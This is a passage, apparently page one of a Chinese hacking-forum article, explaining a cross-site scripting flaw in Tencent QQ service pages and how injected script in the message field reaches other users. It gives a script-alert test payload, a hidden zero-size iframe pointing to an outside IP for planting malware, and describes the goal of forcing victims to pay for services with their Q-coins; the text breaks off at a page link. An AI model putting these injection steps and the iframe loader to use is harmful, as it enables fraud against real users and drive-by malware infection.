这阶段跨站闹的很凶..QQ也接连出了几个跨站漏洞..这不.QQ业务也出了跨站漏洞..经过测试
不论是QQ会员,黄钻贵族,QQ炫铃.等..都可以跨站..
这个漏洞也不是我发现的..是我的好友netshow告诉我的..听他说也是经过玄猫指点..所以在这里也要感谢玄猫
..又为我们带来了一经典之作..
具体危害和玄猫写过的一篇"QQ跨站漏洞巧利用强迫他人为你购买QQ秀"差不多..只是这个是用来购买腾讯服务
的...这个危害比那个还要大...如果你的QQ币足够支付的话.
首先我们来看一下这个漏洞.
首先进入
http://my.QQ.com/
打开业务列表..随便点个业务把..在"索要留言"里写代码:<script>alert('fhod');</script>
这时候对方QQ会出现系统提示..图1..
这里我们的留言很明显就被对方看到了..所以我们在留言的时候最好在前
面写一段话....然后后面在写<script>alert('fhod');</script>
然后对方查看的时候就会在浏览器上弹出一个内容为"fhod"的对话框.图2
那我们能不能利用它来做些什么呢?其实这个漏洞是完全可以让对方给你购买服务的..前提是只要对方查看了..
不过我对脚本不是很懂,.所以没做深入研究..我想只要把玄猫的那个看懂了..就可以举一反三..彻底的利用这
个漏洞..
我简单说下我怎么做的把
测试的时候在留言处写<iframe>进行挂马是行不通的..我写了
<iframe src=http://218.xx.xx.xxx/kz.htm width=0 height=0></iframe>
然后查看接受的代码就成了
<td>QQ炫铃服务费用:</td>
</tr>
<tr>
<td>预支付
<input type="text" name="textfield" size="2" maxlength="2"
class="border" value="1" onfocus="javascript:SetFee_give();">
个月,总金额为:<font color="#FF0000">
<input label name="total_fee" size="3"
maxlength="3" style="border:#ffffff 1px solid">Q币</td>
</tr>
<tr><td><font color="#0000FF">您可以修改预支付的
月数。</font></td></tr>
</table>
[1] [2] 下一页
|
